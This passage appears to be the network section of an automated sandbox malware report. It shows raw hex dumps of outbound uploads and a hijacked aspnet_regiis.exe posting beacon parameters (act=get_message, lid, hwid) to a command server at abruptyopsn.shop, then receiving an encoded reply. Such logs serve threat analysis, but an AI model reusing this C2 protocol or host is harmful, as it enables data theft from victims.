                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 26 21 9d ea 28 f9 ff fb 30 c0 83 3b c9 2f 8c 01 82 be 30 22 53 92 82 9d 40 89 a4 2d 87 c0 dc cd 45 49 f1 09 b1 0e c8 75 35 62 53 65 58 d6 09 96 0f 43 98 45 5a cd 9a 57 99 75 ee e3 e6 a2 4f 47 6f 67 fc 7a 5c cd a2 42 db ef 32 3b 8b ff 1a ec 36 16 80 b5 8a 1d 31 a2 4c a7 3c 34 92 ef 5b 45 35 9b 52 ef 73 65 2f 32 24 36 87 35 03 70 97 cc d9 c1 82 64 21 7e 28 09 bc fc 1e fd 44 b5 cc 90 9e bb a3 c5 78 63 fb 51 d5 a4 39 44 de 55 5b e7 b0 b2 3b b1 8f b7 21 c1 76 15 d8 31 c4 25 a5 ec 54 f5 e7 97 b1 a3 91 4c f5 d2 a1 74 31 b3 56 86 3c 34 69 d4 48 6e d1 6b a2 24 2d eb ff 05 96 c2 31 49 0a 6a 93 22 54 02 fb c6 c7 03 c7 6e 0e e0 ed 73 92 c0 52 66 28 69 e6 89 30 69 6a 7a 75 e2 0d a5 96 5f b1 37 bd b4 47 7f 63 fa 38 15 89 2d 84 2d 2a e4 ab 27 65 9c 1c ec 57 2d a6 1e 76
                                                                                        Data Ascii: &!(0;/0"S@-EIu5bSeXCEZWuOGogz\B2;61L<4[E5Rse/2$65pd!~(DxcQ9DU[;!v1%TLt1V<4iHnk$-1Ij"TnsRf(i0ijzu_7Gc8--*'eW-v
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 14 1a ed 4d e6 05 5b 79 8f a2 18 4f d4 00 ee 1d 5e c5 68 78 b3 55 b0 d9 bd c0 8b bd 6f f5 dc 66 d3 ba 73 1b ef 98 e4 05 7e e0 55 ac 4c 17 19 ff 3a f4 ae bf 5c 2c df e2 1e c1 f8 0c cc 7c 4c 0b 9b d6 68 61 fc 6d b0 33 b3 be e3 27 c6 e8 0a 71 4b 97 81 c5 e4 6b 2b 38 df fd ae 29 d1 a1 71 66 ac e2 61 45 da 23 7d f1 bf c9 75 ad d5 55 45 36 9c bc bf e5 04 d3 5f e6 9a 8f 7c ef 9e 6a ff 37 3c 50 87 a8 7a 4c ea c3 1c b8 7f 6c 7f ec e4 8a 36 9b 5a fd e5 54 da 42 70 e3 5a 6c d9 17 c3 eb e3 77 d6 8c a6 f8 8e d3 52 43 59 b9 57 ff 3a b1 e9 fd c9 50 81 16 e2 f8 f5 5b ec c6 d4 82 ac 15 be 70 66 a1 2a 21 fd 5c e8 7c 7f 98 c3 a7 fa ea bf dd e5 7e ca b5 5e 6c e5 54 8d 45 88 a4 06 fa 0f b2 d4 64 7c 96 27 d6 5e 7a 2f 9f 36 e1 03 ed 4b 9c 98 59 86 bd 23 56 a9 e2 80 a2 ea 30 ad
                                                                                        Data Ascii: M[yO^hxUofs~UL:\,|Lham3'qKk+8)qfaE#}uUE6_|j7<PzLl6ZTBpZlwRCYW:P[pf*!\|~^lTEd|'^z/6KY#V0
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 64 2f ce d7 e3 77 97 52 75 36 a7 8f ee b6 1a 08 e5 5e c5 23 e8 1a 7f 65 e5 a5 4f d2 5c ad 1d de 18 98 e3 32 4b c1 8c 1e 99 ac 17 b7 ab 06 83 04 e1 77 ab 51 45 ce 69 62 71 fa 8d 34 68 c1 0a 63 1c 84 18 eb c1 9e b8 42 63 3a 01 74 e1 0b e3 37 a7 15 0d 45 6f f5 a6 e4 47 d2 3b f2 0c 95 30 dc 5f 05 cf 37 91 9e d7 0e ca 9f e7 83 6a 08 e0 7c b3 d8 13 16 75 82 d9 97 53 90 b6 d5 23 bc fb d1 23 67 51 f7 b1 4f 1e 26 2b 40 89 d4 15 10 1a f5 52 36 0b 5f 84 0d ed de 65 c3 85 91 90 eb 56 67 b1 a4 07 f9 4a 76 84 e6 bf fd c8 56 03 45 4d 41 25 ab e8 5f 27 c9 f1 02 02 7f e6 58 29 d7 e6 72 d7 78 6b fd 95 35 2e 60 f7 db f4 81 08 a8 a0 d5 d4 15 5d 6a e3 df bb 7a ee c2 c2 c9 f3 7e 49 8b 36 c7 2a 7e b9 1f 7b c7 34 3f ef fc 88 4e 5e e0 f9 cf dc a7 63 5f 99 fb 32 9a 6e 94 0c f3 fd
                                                                                        Data Ascii: d/wRu6^#eO\2KwQEibq4hcBc:t7EoG;0_7j|uS##gQO&+@R6_eVgJvVEMA%_'X)rxk5.`]jz~I6*~{4?N^c_2n
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: d7 71 61 43 9d ab 52 99 e5 57 f0 34 84 4c a1 1c 08 f6 12 1e 39 58 da 56 cd 7b 05 84 38 4d 73 bc 72 51 51 3e c4 dd 6d d2 25 93 97 84 8d 9a c0 60 f2 96 13 cc 9c a0 91 a0 3a 93 13 0f 28 0d 56 05 c6 e1 1e f9 b0 92 e0 e2 fb 80 49 87 79 fc 91 17 22 0d 4e 51 bf 65 8f 10 3f 24 98 db 86 79 71 de b3 4b 8b e5 5a 1e 6c 9a 97 4f 1b 4d d2 4b fe 9d 15 47 99 bb 44 5e a0 de ec dc 75 d2 90 e1 f4 a1 f6 4e aa e2 32 43 37 93 5e 22 6a 74 25 64 f6 2b b9 2e a8 58 a7 f6 a7 88 9a 4a dc 07 7b 58 17 eb e7 05 3e 62 13 9d ce 63 32 4c f5 4a f0 2e 9a f8 b5 43 47 c3 1c 8f 24 0e 91 4e 8d cd 50 a6 b5 6a c5 ea 7c df e7 dc dd 3b 20 f1 f8 0d 55 6b 9b c8 1b 51 84 d9 9b af 6b 35 10 7e 04 40 2a 63 7e 58 27 9f 41 e9 61 1b e7 9f 28 03 7a 99 39 97 8a 7c 65 14 a1 f0 68 e2 74 d4 e6 ed 00 0d b5 66 e4
                                                                                        Data Ascii: qaCRW4L9XV{8MsrQQ>m%`:(VIy"NQe?$yqKZlOMKGD^uN2C7^"jt%d+.XJ{X>bc2LJ.CG$NPj|; UkQk5~@*c~X'Aa(z9|ehtf
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: b0 98 bd 82 46 c1 a7 b8 c1 66 12 a8 a9 2b c6 af 14 b7 a1 66 fa 83 50 ac ab 87 55 6e f4 06 5f 0a a3 a5 47 15 68 b1 8f 70 37 46 83 c8 0c 7a 98 8f 1f 49 45 8d ab 05 41 84 78 95 4a b4 49 da 61 f0 70 de 29 60 eb 6d e3 0c 79 7a f2 c7 e1 35 85 97 b3 91 cb 5a e4 84 21 f4 46 4e a0 dc 60 a5 0e 14 f6 84 4b 42 49 af 69 a3 70 f7 ce 69 3f e5 ae 60 90 4b 78 02 17 fc f7 89 03 e1 7d 24 c6 50 4c b4 cc 32 51 65 8c fb 3a 14 15 1a 7e 94 11 ca d5 22 0c 33 c4 16 19 d6 47 5d af 1b 59 39 61 b6 a2 16 b0 3f cf d1 a7 58 16 09 4e 2f 03 3d cc 54 b2 67 2b 77 78 d6 fa 93 2a 57 24 a6 d4 6a cb d0 71 22 ae 0d a5 5b a2 50 9d f8 23 4a 91 60 58 b3 16 17 31 8e 1c bb c6 df d0 e3 63 7f 05 6f 60 e5 3c 64 e1 84 d8 18 16 ff c8 f0 23 27 e1 10 86 58 8b d9 c4 9e 7b 6b f6 8a e1 c1 47 f6 2c de 90 9b c8
                                                                                        Data Ascii: Ff+fPUn_Ghp7FzIEAxJIap)`myz5Z!FN`KBIipi?`Kx}$PL2Qe:~"3G]Y9a?XN/=Tg+wx*W$jq"[P#J`X1co`<d#'X{kG,
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: a0 86 c0 bd ad 8d 15 31 ba ec ba 81 0c bc af 2c dc f7 64 82 3f b1 1c 3f 74 7d 67 f7 65 ca a9 4d 25 4f c0 e1 78 03 a5 4a 01 26 9a 20 ef cb 86 05 07 3c e6 b8 31 7d 0d f7 48 3e 65 f0 a8 c1 b9 9c d8 f4 73 c3 ac db 6f 91 ce 32 85 c7 1a 0a 21 c1 f2 a8 95 fb db c9 c9 51 e5 21 fd c4 a2 2f b5 af 59 d6 53 37 9b 52 dc d4 f9 e9 f9 91 57 c2 52 0e c6 f4 2d 1b b7 2c 7e 41 fe 1d a4 3b 36 ab 47 0f 62 89 0e 62 c2 28 32 cc b8 31 97 a6 5e 2e f2 5d c7 8d f8 f6 36 8f 09 d0 35 aa b9 be 07 88 6d 40 27 16 ee fc 6d b6 cc 18 38 2f 7a 7d 73 95 61 b9 ac a8 27 6a 67 97 4d cc 12 01 2b aa 44 2f af 31 89 1f 95 75 ed 81 b3 10 5c f5 38 c9 92 ac de 23 70 7f 04 1a fb 8d 80 6d f4 6b d9 c6 8c 3d 40 30 cb b4 1b 11 9f 2e ce 73 92 2c 39 25 8f 7f 16 a9 69 88 5f d0 87 eb 97 f8 c0 97 c8 82 8a 3b 70
                                                                                        Data Ascii: 1,d??t}geM%OxJ& <1}H>eso2!Q!/YS7RWR-,~A;6Gbb(21^.]65m@'m8/z}sa'jgM+D/1u\8#pmk=@0.s,9%i_;p
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 54 1f 8e 81 cd 42 83 3a 88 74 92 ea c1 b1 00 c9 23 44 e4 8d e2 02 8e 92 e5 48 f6 5d 24 57 be fc ac eb 3f 32 ea d0 39 df 6c 8d 42 84 b1 c7 16 72 97 94 31 a0 78 ce 10 22 d0 d3 b5 98 e6 14 14 62 f3 e7 24 70 de 93 e2 56 e3 83 be 6a e6 b4 18 ad 26 e4 1a 00 a2 9f 50 cd 9c 98 f1 de a0 5e 91 36 bd 59 1f 44 a4 11 69 7a 4a 5b 34 7e 77 92 24 ef 4d 1f 0d 0d 94 7f e5 5e 88 c8 ae 7e 10 2e 95 c3 42 f2 35 71 cc 15 1d eb c5 10 ef a7 cb c6 78 27 47 e8 c3 7c af 16 f2 3d 07 38 3d 45 70 a8 0f 4a cf 9f d0 69 e5 79 78 25 2c f3 f4 1e 36 10 08 e6 e2 78 37 6b 6a 15 81 e4 11 2a 95 cd 4c af 40 cc df 5f 85 be 89 c5 f5 87 fa 82 17 7d 73 67 3a 9a 5c d0 a1 3d bb c9 eb 8d c7 70 65 0c 57 85 c2 c6 90 7e 6c 9c ee 27 d9 d4 30 19 80 98 ae e5 3c dd 81 49 1e e5 63 ce a2 96 ea 83 c3 88 8d e1 b7
                                                                                        Data Ascii: TB:t#DH]$W?29lBr1x"b$pVj&P^6YDizJ[4~w$M^~.B5qx'G|=8=EpJiyx%,6x7kj*L@_}sg:\=peW~l'0<Ic
                                                                                        2024-12-31 16:40:18 UTC15331OUTData Raw: 35 1a 5f 72 66 8c 92 02 79 8f 8e 14 88 85 5c 86 62 6a ab 6f 9c b3 40 d0 d2 16 c2 cb 50 48 74 9d fd d6 c5 f1 54 ec e6 3e 54 ae 2a 39 66 ca ef 81 9f 19 88 f1 b1 18 80 63 d7 4f 62 90 da d8 23 ad 7c be 7a e5 8e 3e 2b dc 52 3d cc e0 00 10 9e 7f bb d5 5d 6b 54 5b 93 21 c1 d9 0e 5e 4c 09 14 22 d8 e4 ae d1 7b 46 f8 3d 67 1e 4f f8 16 71 f6 8a 59 72 eb 83 3b e4 e5 dd 8e b0 a6 40 59 77 9c 74 80 b5 c7 72 83 a0 7a 1b 8a ec 20 81 62 ba 8b c2 94 30 7f ec 26 7a 75 44 e3 53 78 de e8 cc c5 42 77 28 c3 d9 53 59 c2 13 a6 b9 ca cd 98 f7 44 7f 52 73 ab 8e 08 89 e1 ec 53 88 f5 8b 41 f2 64 8d 91 04 9f 0d bb c1 9a 67 02 a9 7f dc 07 e8 b1 a0 ee 4f 96 2a 83 f8 35 2e de 20 cc a0 8c 1d 20 d7 ca 92 3e e1 62 62 10 82 cb 4c f7 c3 4d 0e b2 d8 e3 cb a7 3e e1 20 c0 3f eb ed fe 59 3e 7b e3
                                                                                        Data Ascii: 5_rfy\bjo@PHtT>T*9fcOb#|z>+R=]kT[!^L"{F=gOqYr;@Ywtrz b0&zuDSxBw(SYDRsSAdgO*5. >bbLM> ?Y>{
                                                                                        2024-12-31 16:40:20 UTC1131INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:20 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=vsd2qkq5ghcf7m230m901aketm; expires=Sat, 26 Apr 2025 10:26:59 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=24l2NTcxtAJuNbahoqtggIn4%2B4HFIvEXpQp%2FVRppZHNgcCc15Zz2eQxFWjpOI9WInch2zoeq7WgCYQPT0XBAjWSH1BI%2BT0TVmLOi0SfSL2WKHT4FjQClbonRgPr9%2B7TO7h2X"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5e9ff61de9a-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1583&rtt_var=603&sent=202&recv=588&lost=0&retrans=0&sent_bytes=3052&recv_bytes=573182&delivery_rate=2698706&cwnd=210&unsent_bytes=0&cid=1b500dac2ebdeb7d&ts=2692&x=0"


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.649994104.21.96.14434512C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-31 16:40:21 UTC264OUTPOST /api HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                        Content-Length: 89
                                                                                        Host: abruptyopsn.shop
                                                                                        2024-12-31 16:40:21 UTC89OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 77 63 79 6a 73 6b 61 6a 65 6e 61 6f 26 6a 3d 26 68 77 69 64 3d 33 37 44 37 45 32 36 34 30 46 39 34 34 44 41 33 37 32 36 37 31 45 34 34 44 38 34 32 30 32 39 41
                                                                                        Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--wcyjskajenao&j=&hwid=37D7E2640F944DA372671E44D842029A
                                                                                        2024-12-31 16:40:21 UTC1127INHTTP/1.1 200 OK
                                                                                        Date: Tue, 31 Dec 2024 16:40:21 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=ni6e9n5gp87goklebkmf8k0qe3; expires=Sat, 26 Apr 2025 10:27:00 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        X-XSS-Protection: 1; mode=block
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e8%2BQivjwdhOuVJk1K6DZJtzQClZ3pdwZPSje83wL7df%2FK7awL0MsfXMbSBZiUridpfWHIfoepvTFRl%2BLkvKC6aIm7JXLaFyhdnWvq%2FTkEaJontnIZkMrWEhgV%2FhrISOQoN%2Ft"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8fabb5fdde501a48-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1928&rtt_var=742&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3052&recv_bytes=989&delivery_rate=2185628&cwnd=158&unsent_bytes=0&cid=b80b3dd1ef8f3f6f&ts=459&x=0"
                                                                                        2024-12-31 16:40:21 UTC242INData Raw: 33 36 61 30 0d 0a 33 34 61 4a 4d 45 31 62 73 47 7a 43 33 2b 77 35 56 71 64 56 37 49 6e 73 31 41 44 32 64 31 38 59 46 4e 67 4d 48 67 66 58 73 68 75 45 2f 61 74 57 4f 58 6d 4b 58 65 37 39 69 52 74 73 6c 6e 6e 4f 37 63 37 75 49 73 5a 47 43 6d 67 6e 73 6d 46 5a 66 35 7a 4b 52 2f 43 33 2b 30 41 72 46 4f 6f 50 6c 4b 75 70 64 68 7a 71 4a 36 33 67 32 4b 4a 31 70 51 64 76 4c 55 44 71 65 46 6c 6b 70 74 59 77 75 73 4b 34 65 43 67 55 2b 51 36 48 72 61 52 50 41 64 49 35 31 4c 79 41 72 46 66 47 4a 6d 74 7a 62 61 74 50 55 6d 37 38 68 31 65 78 30 75 56 67 4c 47 76 71 46 62 4c 73 31 58 63 41 37 44 48 59 76 49 53 6e 55 34 55 52 5a 6e 6b 69 67 48 5a 7a 58 35 48 51 53 5a 76 76 33 58 73 36 45 73 55 67 39 62 53 64 58 52 6e 79 62 4a 33 35
                                                                                        Data Ascii: 36a034aJME1bsGzC3+w5VqdV7Ins1AD2d18YFNgMHgfXshuE/atWOXmKXe79iRtslnnO7c7uIsZGCmgnsmFZf5zKR/C3+0ArFOoPlKupdhzqJ63g2KJ1pQdvLUDqeFlkptYwusK4eCgU+Q6HraRPAdI51LyArFfGJmtzbatPUm78h1ex0uVgLGvqFbLs1XcA7DHYvISnU4URZnkigHZzX5HQSZvv3Xs6EsUg9bSdXRnybJ35
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 67 70 39 75 6b 45 51 4b 61 55 44 6f 53 48 56 2b 72 65 56 64 75 75 54 37 51 78 6c 69 2f 44 61 41 37 4b 39 4c 59 4f 49 6d 72 74 69 47 6a 6e 71 52 44 7a 5a 57 62 71 31 75 57 6e 36 76 68 56 69 78 34 74 78 46 65 68 7a 57 50 37 71 6f 67 42 49 4b 69 47 53 6b 73 4e 58 6d 52 5a 63 69 45 32 31 4f 6a 7a 31 50 66 5a 43 5a 4c 70 4f 31 79 67 45 64 4f 74 34 32 38 4b 76 66 45 6a 57 65 42 49 37 69 32 62 78 7a 70 51 51 35 49 58 58 75 56 43 64 71 6a 2f 51 75 69 63 2f 67 64 44 51 73 2b 52 71 4f 36 49 64 49 4d 75 49 41 31 66 75 2b 75 6b 75 59 45 57 38 6f 51 61 67 2f 64 47 71 41 79 6c 43 6e 32 71 59 42 50 79 76 57 49 35 69 38 75 6b 6b 54 36 41 2b 68 2b 36 32 39 4e 4b 59 43 44 48 64 42 37 56 67 73 63 35 44 52 61 72 76 61 70 6d 59 62 43 4e 34 4a 6a 59 61 4f 66 43 54 76 66 71 76
                                                                                        Data Ascii: gp9ukEQKaUDoSHV+reVduuT7Qxli/DaA7K9LYOImrtiGjnqRDzZWbq1uWn6vhVix4txFehzWP7qogBIKiGSksNXmRZciE21Ojz1PfZCZLpO1ygEdOt428KvfEjWeBI7i2bxzpQQ5IXXuVCdqj/Quic/gdDQs+RqO6IdIMuIA1fu+ukuYEW8oQag/dGqAylCn2qYBPyvWI5i8ukkT6A+h+629NKYCDHdB7Vgsc5DRarvapmYbCN4JjYaOfCTvfqv
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 70 51 6c 47 33 46 41 6b 33 74 58 63 70 75 46 63 4b 37 69 78 6d 56 30 4b 65 49 43 69 62 47 4b 43 57 66 79 4a 64 2f 6a 67 5a 4e 34 76 51 38 44 4e 79 57 71 66 48 68 49 6a 64 46 4e 71 38 50 47 65 67 41 70 38 51 58 32 71 5a 6c 71 4a 70 64 67 75 4c 75 59 6b 32 4f 48 45 77 4d 33 51 49 35 66 63 47 4b 59 36 33 6d 61 39 4d 46 73 59 67 7a 46 41 50 72 71 67 45 45 42 6c 77 54 59 34 70 57 6e 51 37 6f 65 64 43 31 66 74 6c 68 79 56 37 61 43 51 61 62 32 75 67 6b 44 44 66 73 49 39 75 71 45 53 67 58 55 4d 39 58 6f 32 6f 78 36 6d 79 38 5a 65 6b 61 63 5a 55 70 4d 6f 50 74 75 6b 37 48 69 51 53 6b 55 35 56 57 77 6a 59 4a 79 4f 4d 46 6c 33 64 79 63 35 32 71 62 4d 43 64 54 62 49 51 6a 4c 33 57 6e 31 46 53 46 35 64 39 45 43 42 54 36 49 62 43 65 68 51 30 67 30 67 61 63 75 64 6d 41
                                                                                        Data Ascii: pQlG3FAk3tXcpuFcK7ixmV0KeICibGKCWfyJd/jgZN4vQ8DNyWqfHhIjdFNq8PGegAp8QX2qZlqJpdguLuYk2OHEwM3QI5fcGKY63ma9MFsYgzFAPrqgEEBlwTY4pWnQ7oedC1ftlhyV7aCQab2ugkDDfsI9uqESgXUM9Xo2ox6my8ZekacZUpMoPtuk7HiQSkU5VWwjYJyOMFl3dyc52qbMCdTbIQjL3Wn1FSF5d9ECBT6IbCehQ0g0gacudmA
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 46 63 63 75 46 74 4b 46 4b 65 68 79 4f 38 2f 4f 77 45 4f 68 2b 41 58 4c 76 30 6f 41 34 39 7a 67 61 57 77 61 66 73 55 37 41 67 46 69 70 7a 6b 33 35 4a 54 6f 62 2b 59 75 76 4e 34 77 41 71 4b 34 55 30 6c 75 69 48 57 42 66 51 5a 4e 2f 2f 73 50 74 49 6a 78 59 6d 66 30 61 41 50 45 78 6b 67 50 31 42 74 64 44 67 63 69 67 64 2b 6a 61 61 36 59 74 73 62 74 4d 37 72 74 79 48 34 6b 53 78 46 68 56 43 4a 65 74 4e 57 6d 2b 61 69 32 33 72 76 38 74 7a 64 53 6a 52 47 36 37 73 68 55 77 38 38 69 57 6e 7a 34 4f 56 4d 73 41 52 4c 43 35 2b 68 43 4e 36 66 35 48 64 56 6f 62 6e 33 33 45 37 45 4f 63 65 68 4a 61 6a 64 6d 65 53 4e 34 44 6b 6c 4b 5a 47 6e 53 59 65 59 56 57 56 57 56 56 77 72 59 4a 35 71 2b 6e 47 58 41 49 61 30 6a 6d 52 75 4a 52 55 50 38 49 34 75 63 62 5a 6d 58 47 30 4d
                                                                                        Data Ascii: FccuFtKFKehyO8/OwEOh+AXLv0oA49zgaWwafsU7AgFipzk35JTob+YuvN4wAqK4U0luiHWBfQZN//sPtIjxYmf0aAPExkgP1BtdDgcigd+jaa6YtsbtM7rtyH4kSxFhVCJetNWm+ai23rv8tzdSjRG67shUw88iWnz4OVMsARLC5+hCN6f5HdVobn33E7EOcehJajdmeSN4DklKZGnSYeYVWVWVVwrYJ5q+nGXAIa0jmRuJRUP8I4ucbZmXG0M
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 69 5a 56 6c 4c 76 6f 70 34 6b 38 50 63 47 79 70 6f 34 43 4c 32 6e 4c 35 33 4e 50 55 42 32 37 32 57 68 30 6d 62 47 6a 46 73 5a 59 68 45 64 32 4f 50 2f 53 6d 55 36 4f 38 44 41 68 4c 43 47 59 36 6e 71 30 41 76 7a 6d 50 64 76 70 79 79 64 5a 6f 69 42 31 64 48 71 7a 35 72 4e 4c 4c 61 56 37 76 77 75 58 6f 42 46 66 70 64 6d 4a 57 48 63 6a 36 51 42 39 37 4f 31 62 78 7a 76 6a 6b 58 51 55 4c 7a 65 31 46 6d 74 4e 68 32 6d 64 7a 6f 65 69 38 66 31 44 79 56 6c 34 73 41 47 4d 4d 4a 77 39 69 2b 6a 55 75 58 4c 53 35 53 4a 2b 42 43 66 32 57 56 36 79 6d 53 34 4e 46 37 5a 6a 4c 30 50 50 54 6f 6c 48 51 52 7a 52 53 30 37 72 69 66 64 34 52 42 47 46 42 54 38 30 4a 76 55 4f 58 7a 51 34 61 33 30 46 63 73 4e 73 63 63 38 62 57 48 44 41 62 68 47 71 33 43 76 59 64 77 6a 68 6f 31 61 55
                                                                                        Data Ascii: iZVlLvop4k8PcGypo4CL2nL53NPUB272Wh0mbGjFsZYhEd2OP/SmU6O8DAhLCGY6nq0AvzmPdvpyydZoiB1dHqz5rNLLaV7vwuXoBFfpdmJWHcj6QB97O1bxzvjkXQULze1FmtNh2mdzoei8f1DyVl4sAGMMJw9i+jUuXLS5SJ+BCf2WV6ymS4NF7ZjL0PPTolHQRzRS07rifd4RBGFBT80JvUOXzQ4a30FcsNscc8bWHDAbhGq3CvYdwjho1aU
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 62 34 2f 37 57 4b 58 52 76 33 55 4b 4c 4e 59 48 70 6f 6d 32 58 54 32 54 49 49 2f 74 67 2b 4a 6e 6d 30 34 37 61 79 57 49 66 58 68 62 2b 4d 68 30 72 75 4c 73 66 69 6b 44 2f 31 36 4a 73 59 70 4e 4d 76 30 44 31 64 32 5a 6b 31 4f 56 4d 57 5a 33 4a 49 51 6a 66 58 2b 61 2f 48 4f 78 33 73 4e 36 47 78 58 71 4b 61 71 56 33 67 45 6e 34 52 32 30 75 35 69 54 59 34 63 54 64 43 6b 6c 74 46 52 48 5a 59 37 6f 55 65 6a 4f 75 31 6f 5a 59 76 6c 64 74 34 71 30 55 78 50 4b 45 74 6a 39 76 35 68 70 6b 7a 45 2b 61 6c 4f 76 54 31 4e 49 68 76 78 4a 6c 73 58 7a 5a 33 6f 2f 2b 31 53 51 72 4a 39 59 4e 66 74 36 70 63 69 30 76 6d 32 75 4d 54 31 72 58 49 39 41 61 32 79 56 78 79 6e 30 35 2b 41 47 66 79 37 42 47 37 53 47 33 57 4d 31 34 69 53 5a 37 71 71 67 52 49 63 34 4d 31 64 56 67 47 6c
                                                                                        Data Ascii: b4/7WKXRv3UKLNYHpom2XT2TII/tg+Jnm047ayWIfXhb+Mh0ruLsfikD/16JsYpNMv0D1d2Zk1OVMWZ3JIQjfX+a/HOx3sN6GxXqKaqV3gEn4R20u5iTY4cTdCkltFRHZY7oUejOu1oZYvldt4q0UxPKEtj9v5hpkzE+alOvT1NIhvxJlsXzZ3o/+1SQrJ9YNft6pci0vm2uMT1rXI9Aa2yVxyn05+AGfy7BG7SG3WM14iSZ7qqgRIc4M1dVgGl
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 48 6d 47 76 38 70 6f 4e 51 2f 2b 4c 61 48 76 73 42 59 35 31 42 47 4e 36 4e 75 37 51 70 34 52 61 31 4e 66 6d 32 39 54 62 50 7a 71 59 62 4c 65 7a 31 49 63 4e 2f 4d 66 74 35 75 36 54 7a 79 58 48 34 6e 6c 6f 65 52 43 6a 43 4e 30 63 57 4f 50 66 47 78 78 6c 6f 4e 78 74 73 48 78 66 54 30 73 79 54 6a 33 75 61 4e 6a 4e 66 45 68 6f 62 36 6b 73 47 72 48 54 32 74 64 55 36 4a 38 4c 6a 4b 44 2f 33 2b 32 30 76 31 45 64 41 72 63 42 62 65 4b 75 46 6f 73 36 78 4c 63 32 34 37 6c 57 72 51 52 47 56 64 39 34 55 46 4a 59 6f 75 64 4b 4f 71 30 7a 46 55 4b 63 49 6b 38 6c 34 57 32 64 53 4c 2f 4d 62 43 6d 33 5a 64 78 72 41 59 70 63 58 61 38 50 31 56 6b 6d 74 6b 77 68 2f 7a 6b 61 41 73 35 35 43 32 6d 73 39 74 38 48 66 41 51 31 4d 32 50 6e 45 36 45 4f 68 78 79 54 4b 73 31 54 6c 4b 63
                                                                                        Data Ascii: HmGv8poNQ/+LaHvsBY51BGN6Nu7Qp4Ra1Nfm29TbPzqYbLez1IcN/Mft5u6TzyXH4nloeRCjCN0cWOPfGxxloNxtsHxfT0syTj3uaNjNfEhob6ksGrHT2tdU6J8LjKD/3+20v1EdArcBbeKuFos6xLc247lWrQRGVd94UFJYoudKOq0zFUKcIk8l4W2dSL/MbCm3ZdxrAYpcXa8P1Vkmtkwh/zkaAs55C2ms9t8HfAQ1M2PnE6EOhxyTKs1TlKc
                                                                                        2024-12-31 16:40:21 UTC1369INData Raw: 71 6d 64 6e 74 72 78 51 57 6d 6d 35 68 66 41 50 51 37 75 4f 57 69 6a 44 47 73 50 41 35 63 4c 61 4a 59 64 58 50 6a 68 33 4f 30 77 4f 56 54 43 78 4b 42 4e 4b 69 79 74 46 51 63 7a 78 75 55 78 59 4c 6b 51 6f 42 43 62 57 70 6c 34 45 34 75 52 49 66 6b 63 4b 62 31 2f 67 42 38 44 73 42 56 6e 76 44 55 66 78 6e 56 4c 5a 76 66 71 75 46 6d 75 53 30 38 63 33 62 67 54 6d 6c 4f 70 50 74 2f 76 76 7a 4d 55 69 38 57 67 68 75 4a 73 34 52 38 44 73 41 7a 68 65 65 70 2f 7a 53 75 58 42 78 78 63 37 5a 49 56 46 65 37 69 69 36 7a 2f 74 34 41 47 52 48 63 58 72 53 37 76 45 31 67 30 7a 53 44 2f 39 57 56 59 72 38 57 43 58 42 6c 73 6e 52 74 4c 4b 50 31 49 71 7a 31 33 6b 4d 72 61 6f 6b 65 73 37 6d 46 57 78 48 4e 45 62 6e 67 75 4a 39 33 68 77 34 6e 4c 48 43 65 65 6c 5a 6f 72 6f 